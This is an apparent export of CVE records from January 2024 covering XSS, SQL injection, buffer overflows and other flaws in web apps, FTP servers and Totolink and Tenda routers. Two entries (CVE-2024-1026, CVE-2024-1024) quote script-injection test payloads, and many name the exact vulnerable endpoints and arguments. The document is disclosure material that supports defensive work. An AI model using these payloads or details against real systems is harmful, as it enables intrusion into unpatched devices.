CVE    2024    1026    Candidate    A vulnerability was found in Cogites eReserv 7.7.58 and classified as problematic. This issue affects some unknown processing of the file front/admin/config.php. The manipulation of the argument id with the input %22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-252293 was assigned to this vulnerability.    MISC:https://vuldb.com/?ctiid.252293   |   URL:https://vuldb.com/?ctiid.252293   |   MISC:https://vuldb.com/?id.252293   |   URL:https://vuldb.com/?id.252293    Assigned (20240129)
CVE    2024    1024    Candidate    A vulnerability has been found in SourceCodester Facebook News Feed Like 1.0 and classified as problematic. This vulnerability affects unknown code of the component New Account Handler. The manipulation of the argument First Name/Last Name with the input <script>alert(1)</script> leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252292.    MISC:https://vuldb.com/?ctiid.252292   |   URL:https://vuldb.com/?ctiid.252292   |   MISC:https://vuldb.com/?id.252292   |   URL:https://vuldb.com/?id.252292    Assigned (20240129)
CVE    2024    1022    Candidate    A vulnerability, which was classified as problematic, was found in CodeAstro Simple Student Result Management System 5.6. This affects an unknown part of the file /add_classes.php of the component Add Class Page. The manipulation of the argument Class Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252291.    MISC:https://drive.google.com/file/d/1lPZ1yL9UlU-uB03xz17q4OR9338X_1am/view?usp=sharing   |   URL:https://drive.google.com/file/d/1lPZ1yL9UlU-uB03xz17q4OR9338X_1am/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.252291   |   URL:https://vuldb.com/?ctiid.252291   |   MISC:https://vuldb.com/?id.252291   |   URL:https://vuldb.com/?id.252291    Assigned (20240129)
CVE    2024    1021    Candidate    A vulnerability, which was classified as critical, has been found in Rebuild up to 3.5.5. Affected by this issue is the function readRawText of the component HTTP Request Handler. The manipulation of the argument url leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252290 is the identifier assigned to this vulnerability.    MISC:https://vuldb.com/?ctiid.252290   |   URL:https://vuldb.com/?ctiid.252290   |   MISC:https://vuldb.com/?id.252290   |   URL:https://vuldb.com/?id.252290   |   MISC:https://www.yuque.com/mailemonyeyongjuan/tha8tr/yemvnt5uo53gfem5   |   URL:https://www.yuque.com/mailemonyeyongjuan/tha8tr/yemvnt5uo53gfem5    Assigned (20240129)
CVE    2024    1020    Candidate    A vulnerability classified as problematic was found in Rebuild up to 3.5.5. Affected by this vulnerability is the function getStorageFile of the file /filex/proxy-download. The manipulation of the argument url leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252289 was assigned to this vulnerability.    MISC:https://vuldb.com/?ctiid.252289   |   URL:https://vuldb.com/?ctiid.252289   |   MISC:https://vuldb.com/?id.252289   |   URL:https://vuldb.com/?id.252289   |   MISC:https://www.yuque.com/mailemonyeyongjuan/tha8tr/gdd3hiwz8uo6ylab   |   URL:https://www.yuque.com/mailemonyeyongjuan/tha8tr/gdd3hiwz8uo6ylab    Assigned (20240129)
CVE    2024    1019    Candidate    ModSecurity / libModSecurity 3.0.0 to 3.0.11 is affected by a WAF bypass for path-based payloads submitted via specially crafted request URLs. ModSecurity v3 decodes percent-encoded characters present in request URLs before it separates the URL path component from the optional query string component. This results in an impedance mismatch versus RFC compliant back-end applications. The vulnerability hides an attack payload in the path component of the URL from WAF rules inspecting it. A back-end may be vulnerable if it uses the path component of request URLs to construct queries. Integrators and users are advised to upgrade to 3.0.12. The ModSecurity v2 release line is not affected by this vulnerability.    FEDORA:FEDORA-2024-4645d0fdef   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/34KDQNZE2RS3CWFG5654LNHKXXDPIW5I/   |   FEDORA:FEDORA-2024-698e541c52   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K6ZGABPJK2JPVH2JDFHZ5LQLWGONUH7V/   |   MISC:https://owasp.org/www-project-modsecurity/tab_cves#cve-2024-1019-2024-01-30   |   URL:https://owasp.org/www-project-modsecurity/tab_cves#cve-2024-1019-2024-01-30    Assigned (20240129)
CVE    2024    1018    Candidate    A vulnerability classified as problematic has been found in PbootCMS 3.2.5-20230421. Affected is an unknown function of the file /admin.php?p=/Area/index#tab=t2. The manipulation of the argument name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252288.    MISC:https://github.com/1MurasaKi/PboostCMS_XSS/blob/main/README.md   |   URL:https://github.com/1MurasaKi/PboostCMS_XSS/blob/main/README.md   |   MISC:https://vuldb.com/?ctiid.252288   |   URL:https://vuldb.com/?ctiid.252288   |   MISC:https://vuldb.com/?id.252288   |   URL:https://vuldb.com/?id.252288    Assigned (20240129)
CVE    2024    1017    Candidate    A vulnerability was found in Gabriels FTP Server 1.2. It has been rated as problematic. This issue affects some unknown processing. The manipulation of the argument USERNAME leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-252287.    MISC:https://packetstormsecurity.com/files/176714/Gabriels-FTP-Server-1.2-Denial-Of-Service.html   |   URL:https://packetstormsecurity.com/files/176714/Gabriels-FTP-Server-1.2-Denial-Of-Service.html   |   MISC:https://vuldb.com/?ctiid.252287   |   URL:https://vuldb.com/?ctiid.252287   |   MISC:https://vuldb.com/?id.252287   |   URL:https://vuldb.com/?id.252287   |   MISC:https://www.youtube.com/watch?v=wwHuXfYS8yQ   |   URL:https://www.youtube.com/watch?v=wwHuXfYS8yQ    Assigned (20240129)
CVE    2024    1016    Candidate    A vulnerability was found in Solar FTP Server 2.1.1/2.1.2. It has been declared as problematic. This vulnerability affects unknown code of the component PASV Command Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-252286 is the identifier assigned to this vulnerability.    MISC:https://packetstormsecurity.com/files/176675/Solar-FTP-Server-2.1.2-Denial-Of-Service.html   |   URL:https://packetstormsecurity.com/files/176675/Solar-FTP-Server-2.1.2-Denial-Of-Service.html   |   MISC:https://vuldb.com/?ctiid.252286   |   URL:https://vuldb.com/?ctiid.252286   |   MISC:https://vuldb.com/?id.252286   |   URL:https://vuldb.com/?id.252286    Assigned (20240129)
CVE    2024    1015    Candidate    Remote command execution vulnerability in SE-elektronic GmbH E-DDC3.3 affecting versions 03.07.03 and higher. An attacker could send different commands from the operating system to the system via the web configuration functionality of the device.    MISC:https://www.hackplayers.com/2024/01/cve-2024-1014-and-cve-2024-1015.html   |   URL:https://www.hackplayers.com/2024/01/cve-2024-1014-and-cve-2024-1015.html   |   MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-se-elektronic-gmbh-products   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-se-elektronic-gmbh-products    Assigned (20240129)
CVE    2024    1014    Candidate    Uncontrolled resource consumption vulnerability in SE-elektronic GmbH E-DDC3.3 affecting versions 03.07.03 and higher. An attacker could interrupt the availability of the administration panel by sending multiple ICMP packets.    MISC:https://www.hackplayers.com/2024/01/cve-2024-1014-and-cve-2024-1015.html   |   URL:https://www.hackplayers.com/2024/01/cve-2024-1014-and-cve-2024-1015.html   |   MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-se-elektronic-gmbh-products   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-se-elektronic-gmbh-products    Assigned (20240129)
CVE    2024    1013    Candidate    An out-of-bounds stack write flaw was found in unixODBC on 64-bit architectures where the caller has 4 bytes and callee writes 8 bytes. This issue may go unnoticed on little-endian architectures, while big-endian architectures can be broken.    MISC:RHBZ#2260823   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2260823   |   MISC:https://access.redhat.com/security/cve/CVE-2024-1013   |   URL:https://access.redhat.com/security/cve/CVE-2024-1013   |   MISC:https://github.com/lurcher/unixODBC/pull/157   |   URL:https://github.com/lurcher/unixODBC/pull/157    Assigned (20240129)
CVE    2024    1012    Candidate    A vulnerability, which was classified as critical, has been found in Wanhu ezOFFICE 11.1.0. This issue affects some unknown processing of the file defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp. The manipulation of the argument recordId leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252281 was assigned to this vulnerability.    MISC:https://github.com/4nNns/cveAdd/blob/b73e94ff089ae2201d9836b4d61b8175ff21618a/sqli/%E4%B8%87%E6%88%B7EZOFFICE%20%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md   |   URL:https://github.com/4nNns/cveAdd/blob/b73e94ff089ae2201d9836b4d61b8175ff21618a/sqli/%E4%B8%87%E6%88%B7EZOFFICE%20%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md   |   MISC:https://vuldb.com/?ctiid.252281   |   URL:https://vuldb.com/?ctiid.252281   |   MISC:https://vuldb.com/?id.252281   |   URL:https://vuldb.com/?id.252281    Assigned (20240129)
CVE    2024    1011    Candidate    A vulnerability classified as problematic was found in SourceCodester Employee Management System 1.0. This vulnerability affects unknown code of the file delete-leave.php of the component Leave Handler. The manipulation of the argument id leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252280.    MISC:https://github.com/jomskiller/Employee-Managemet-System---Broken-Access-Control   |   URL:https://github.com/jomskiller/Employee-Managemet-System---Broken-Access-Control   |   MISC:https://vuldb.com/?ctiid.252280   |   URL:https://vuldb.com/?ctiid.252280   |   MISC:https://vuldb.com/?id.252280   |   URL:https://vuldb.com/?id.252280    Assigned (20240129)
CVE    2024    1010    Candidate    A vulnerability classified as problematic has been found in SourceCodester Employee Management System 1.0. This affects an unknown part of the file edit-profile.php. The manipulation of the argument fullname/phone/date of birth/address/date of appointment leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-252279.    MISC:https://github.com/jomskiller/Employee-Management-System---Stored-XSS   |   URL:https://github.com/jomskiller/Employee-Management-System---Stored-XSS   |   MISC:https://github.com/jomskiller/Employee-Management-System---Stored-XSS/   |   URL:https://github.com/jomskiller/Employee-Management-System---Stored-XSS/   |   MISC:https://vuldb.com/?ctiid.252279   |   URL:https://vuldb.com/?ctiid.252279   |   MISC:https://vuldb.com/?id.252279   |   URL:https://vuldb.com/?id.252279    Assigned (20240129)
CVE    2024    1009    Candidate    A vulnerability was found in SourceCodester Employee Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /Admin/login.php. The manipulation of the argument txtusername leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252278 is the identifier assigned to this vulnerability.    MISC:https://vuldb.com/?ctiid.252278   |   URL:https://vuldb.com/?ctiid.252278   |   MISC:https://vuldb.com/?id.252278   |   URL:https://vuldb.com/?id.252278   |   MISC:https://youtu.be/oL98TSjy89Q?si=_T6YkJZlbn7SJ4Gn   |   URL:https://youtu.be/oL98TSjy89Q?si=_T6YkJZlbn7SJ4Gn    Assigned (20240129)
CVE    2024    1008    Candidate    A vulnerability was found in SourceCodester Employee Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file edit-photo.php of the component Profile Page. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252277 was assigned to this vulnerability.    MISC:https://vuldb.com/?ctiid.252277   |   URL:https://vuldb.com/?ctiid.252277   |   MISC:https://vuldb.com/?id.252277   |   URL:https://vuldb.com/?id.252277   |   MISC:https://www.youtube.com/watch?v=z4gcLZCOcnc   |   URL:https://www.youtube.com/watch?v=z4gcLZCOcnc    Assigned (20240129)
CVE    2024    1007    Candidate    A vulnerability was found in SourceCodester Employee Management System 1.0. It has been classified as critical. Affected is an unknown function of the file edit_profile.php. The manipulation of the argument txtfullname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252276.    MISC:https://vuldb.com/?ctiid.252276   |   URL:https://vuldb.com/?ctiid.252276   |   MISC:https://vuldb.com/?id.252276   |   URL:https://vuldb.com/?id.252276   |   MISC:https://www.youtube.com/watch?v=1yesMwvWcL4   |   URL:https://www.youtube.com/watch?v=1yesMwvWcL4    Assigned (20240129)
CVE    2024    1006    Candidate    A vulnerability was found in Shanxi Diankeyun Technology NODERP up to 6.0.2 and classified as critical. This issue affects some unknown processing of the file application/index/common.php of the component Cookie Handler. The manipulation of the argument Nod_User_Id/Nod_User_Token leads to improper authentication. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252275. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://note.zhaoj.in/share/vWuVlU2eg79t   |   URL:https://note.zhaoj.in/share/vWuVlU2eg79t   |   MISC:https://vuldb.com/?ctiid.252275   |   URL:https://vuldb.com/?ctiid.252275   |   MISC:https://vuldb.com/?id.252275   |   URL:https://vuldb.com/?id.252275    Assigned (20240129)
CVE    2024    1005    Candidate    A vulnerability has been found in Shanxi Diankeyun Technology NODERP up to 6.0.2 and classified as critical. This vulnerability affects unknown code of the file /runtime/log. The manipulation leads to files or directories accessible. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252274 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://note.zhaoj.in/share/M9ERphWTXUPj   |   URL:https://note.zhaoj.in/share/M9ERphWTXUPj   |   MISC:https://vuldb.com/?ctiid.252274   |   URL:https://vuldb.com/?ctiid.252274   |   MISC:https://vuldb.com/?id.252274   |   URL:https://vuldb.com/?id.252274    Assigned (20240129)
CVE    2024    1004    Candidate    A vulnerability, which was classified as critical, was found in Totolink N200RE 9.3.5u.6139_B20201216. This affects the function loginAuth of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument http_host leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252273 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-loginAuth-cbde48da404049328cb698394b6c0641?pvs=4   |   URL:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-loginAuth-cbde48da404049328cb698394b6c0641?pvs=4   |   MISC:https://vuldb.com/?ctiid.252273   |   URL:https://vuldb.com/?ctiid.252273   |   MISC:https://vuldb.com/?id.252273   |   URL:https://vuldb.com/?id.252273    Assigned (20240129)
CVE    2024    1003    Candidate    A vulnerability, which was classified as critical, has been found in Totolink N200RE 9.3.5u.6139_B20201216. Affected by this issue is the function setLanguageCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument lang leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252272. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setLanguageCfg-72357294db1e4f8096b29d3f2592d1fc?pvs=4   |   URL:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setLanguageCfg-72357294db1e4f8096b29d3f2592d1fc?pvs=4   |   MISC:https://vuldb.com/?ctiid.252272   |   URL:https://vuldb.com/?ctiid.252272   |   MISC:https://vuldb.com/?id.252272   |   URL:https://vuldb.com/?id.252272    Assigned (20240129)
CVE    2024    1002    Candidate    A vulnerability classified as critical was found in Totolink N200RE 9.3.5u.6139_B20201216. Affected by this vulnerability is the function setIpPortFilterRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ePort leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252271. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setIpPortFilterRules-71c3f0a947e14b7f95fa19b7d6676994?pvs=4   |   URL:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setIpPortFilterRules-71c3f0a947e14b7f95fa19b7d6676994?pvs=4   |   MISC:https://vuldb.com/?ctiid.252271   |   URL:https://vuldb.com/?ctiid.252271   |   MISC:https://vuldb.com/?id.252271   |   URL:https://vuldb.com/?id.252271    Assigned (20240129)
CVE    2024    1001    Candidate    A vulnerability classified as critical has been found in Totolink N200RE 9.3.5u.6139_B20201216. Affected is the function main of the file /cgi-bin/cstecgi.cgi. The manipulation leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-252270 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-main-942df77e9c70495390e4aed2a29f3d13?pvs=4   |   URL:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-main-942df77e9c70495390e4aed2a29f3d13?pvs=4   |   MISC:https://vuldb.com/?ctiid.252270   |   URL:https://vuldb.com/?ctiid.252270   |   MISC:https://vuldb.com/?id.252270   |   URL:https://vuldb.com/?id.252270    Assigned (20240129)
CVE    2024    1000    Candidate    A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216. It has been rated as critical. This issue affects the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument command leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252269 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setTracerouteCfg-b6b3fe05b4a945a3bc460dbcb61dfc75?pvs=4   |   URL:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setTracerouteCfg-b6b3fe05b4a945a3bc460dbcb61dfc75?pvs=4   |   MISC:https://vuldb.com/?ctiid.252269   |   URL:https://vuldb.com/?ctiid.252269   |   MISC:https://vuldb.com/?id.252269   |   URL:https://vuldb.com/?id.252269    Assigned (20240129)
CVE    2024    999    Candidate    A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216. It has been declared as critical. This vulnerability affects the function setParentalRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument eTime leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252268. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setParentalRules-f891c062b86349a596ee173cb456b4f6?pvs=4   |   URL:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setParentalRules-f891c062b86349a596ee173cb456b4f6?pvs=4   |   MISC:https://vuldb.com/?ctiid.252268   |   URL:https://vuldb.com/?ctiid.252268   |   MISC:https://vuldb.com/?id.252268   |   URL:https://vuldb.com/?id.252268    Assigned (20240129)
CVE    2024    998    Candidate    A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216. It has been classified as critical. This affects the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ip leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252267. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setDiagnosisCfg-b2d36451543e4c6da063646721a24604?pvs=4   |   URL:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setDiagnosisCfg-b2d36451543e4c6da063646721a24604?pvs=4   |   MISC:https://vuldb.com/?ctiid.252267   |   URL:https://vuldb.com/?ctiid.252267   |   MISC:https://vuldb.com/?id.252267   |   URL:https://vuldb.com/?id.252267    Assigned (20240129)
CVE    2024    997    Candidate    A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216 and classified as critical. Affected by this issue is the function setOpModeCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument pppoeUser leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252266 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setOpModeCfg-9faac02b13d84bd3b7fe84aab68c7add?pvs=4   |   URL:https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setOpModeCfg-9faac02b13d84bd3b7fe84aab68c7add?pvs=4   |   MISC:https://vuldb.com/?ctiid.252266   |   URL:https://vuldb.com/?ctiid.252266   |   MISC:https://vuldb.com/?id.252266   |   URL:https://vuldb.com/?id.252266    Assigned (20240129)
CVE    2024    996    Candidate    A vulnerability classified as critical has been found in Tenda i9 1.0.0.9(4122). This affects the function formSetCfm of the file /goform/setcfm of the component httpd. The manipulation of the argument funcpara1 leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252261 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://jylsec.notion.site/Tenda-i9-has-stack-buffer-overflow-vulnerability-in-formSetCfm-c1bd9745c81e4207aceeaa1ba5e10563?pvs=4   |   URL:https://jylsec.notion.site/Tenda-i9-has-stack-buffer-overflow-vulnerability-in-formSetCfm-c1bd9745c81e4207aceeaa1ba5e10563?pvs=4   |   MISC:https://vuldb.com/?ctiid.252261   |   URL:https://vuldb.com/?ctiid.252261   |   MISC:https://vuldb.com/?id.252261   |   URL:https://vuldb.com/?id.252261    Assigned (20240128)
CVE    2024    995    Candidate    A vulnerability was found in Tenda W6 1.0.0.9(4122). It has been rated as critical. Affected by this issue is the function formwrlSSIDset of the file /goform/wifiSSIDset of the component httpd. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252260. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://jylsec.notion.site/Tenda-w6-has-stack-buffer-overflow-vulnerability-in-formwrlSSIDset-e283b41905934e97b4c65632a0018eba?pvs=4   |   URL:https://jylsec.notion.site/Tenda-w6-has-stack-buffer-overflow-vulnerability-in-formwrlSSIDset-e283b41905934e97b4c65632a0018eba?pvs=4   |   MISC:https://vuldb.com/?ctiid.252260   |   URL:https://vuldb.com/?ctiid.252260   |   MISC:https://vuldb.com/?id.252260   |   URL:https://vuldb.com/?id.252260    Assigned (20240128)
CVE    2024    994    Candidate    A vulnerability was found in Tenda W6 1.0.0.9(4122). It has been declared as critical. Affected by this vulnerability is the function formSetCfm of the file /goform/setcfm of the component httpd. The manipulation of the argument funcpara1 leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252259. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://jylsec.notion.site/Tenda-W6-has-stack-buffer-overflow-vulnerability-in-formSetCfm-4fab28f92ca74f519245b606d8345821?pvs=4   |   URL:https://jylsec.notion.site/Tenda-W6-has-stack-buffer-overflow-vulnerability-in-formSetCfm-4fab28f92ca74f519245b606d8345821?pvs=4   |   MISC:https://vuldb.com/?ctiid.252259   |   URL:https://vuldb.com/?ctiid.252259   |   MISC:https://vuldb.com/?id.252259   |   URL:https://vuldb.com/?id.252259    Assigned (20240128)
CVE    2024    993    Candidate    A vulnerability was found in Tenda i6 1.0.0.9(3857). It has been classified as critical. Affected is the function formWifiMacFilterGet of the file /goform/WifiMacFilterGet of the component httpd. The manipulation of the argument index leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-252258 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formWifiMacFilterGet-8b2c5cb67e2a433cad62d737782a7e0f?pvs=4   |   URL:https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formWifiMacFilterGet-8b2c5cb67e2a433cad62d737782a7e0f?pvs=4   |   MISC:https://vuldb.com/?ctiid.252258   |   URL:https://vuldb.com/?ctiid.252258   |   MISC:https://vuldb.com/?id.252258   |   URL:https://vuldb.com/?id.252258    Assigned (20240128)
CVE    2024    992    Candidate    A vulnerability was found in Tenda i6 1.0.0.9(3857) and classified as critical. This issue affects the function formwrlSSIDset of the file /goform/wifiSSIDset of the component httpd. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252257 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formwrlSSIDset-f0e8be2eb0614e03a60160b48f8527f5?pvs=4   |   URL:https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formwrlSSIDset-f0e8be2eb0614e03a60160b48f8527f5?pvs=4   |   MISC:https://vuldb.com/?ctiid.252257   |   URL:https://vuldb.com/?ctiid.252257   |   MISC:https://vuldb.com/?id.252257   |   URL:https://vuldb.com/?id.252257    Assigned (20240128)
CVE    2024    991    Candidate    A vulnerability has been found in Tenda i6 1.0.0.9(3857) and classified as critical. This vulnerability affects the function formSetCfm of the file /goform/setcfm of the component httpd. The manipulation of the argument funcpara1 leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252256. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formSetCfm-9c9952ba7216422c8188e75c94bb531a?pvs=4   |   URL:https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formSetCfm-9c9952ba7216422c8188e75c94bb531a?pvs=4   |   MISC:https://vuldb.com/?ctiid.252256   |   URL:https://vuldb.com/?ctiid.252256   |   MISC:https://vuldb.com/?id.252256   |   URL:https://vuldb.com/?id.252256    Assigned (20240128)
CVE    2024    990    Candidate    A vulnerability, which was classified as critical, was found in Tenda i6 1.0.0.9(3857). This affects the function formSetAutoPing of the file /goform/setAutoPing of the component httpd. The manipulation of the argument ping1 leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252255. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formSetAutoPing-2e009d81eb7e45438565d5ba6794f4e3?pvs=4   |   URL:https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formSetAutoPing-2e009d81eb7e45438565d5ba6794f4e3?pvs=4   |   MISC:https://vuldb.com/?ctiid.252255   |   URL:https://vuldb.com/?ctiid.252255   |   MISC:https://vuldb.com/?id.252255   |   URL:https://vuldb.com/?id.252255    Assigned (20240128)
CVE    2024    989    Candidate    A vulnerability, which was classified as problematic, has been found in Sichuan Yougou Technology KuERP up to 1.0.4. Affected by this issue is the function del_sn_db of the file /application/index/controller/Service.php. The manipulation of the argument file leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. VDB-252254 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://note.zhaoj.in/share/XKxaJTphW6PB   |   URL:https://note.zhaoj.in/share/XKxaJTphW6PB   |   MISC:https://vuldb.com/?ctiid.252254   |   URL:https://vuldb.com/?ctiid.252254   |   MISC:https://vuldb.com/?id.252254   |   URL:https://vuldb.com/?id.252254    Assigned (20240128)
CVE    2024    988    Candidate    A vulnerability classified as critical was found in Sichuan Yougou Technology KuERP up to 1.0.4. Affected by this vulnerability is the function checklogin of the file /application/index/common.php. The manipulation of the argument App_User_id/App_user_Token leads to improper authentication. The exploit has been disclosed to the public and may be used. The identifier VDB-252253 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://note.zhaoj.in/share/2dBOnquxgCDl   |   URL:https://note.zhaoj.in/share/2dBOnquxgCDl   |   MISC:https://vuldb.com/?ctiid.252253   |   URL:https://vuldb.com/?ctiid.252253   |   MISC:https://vuldb.com/?id.252253   |   URL:https://vuldb.com/?id.252253    Assigned (20240128)
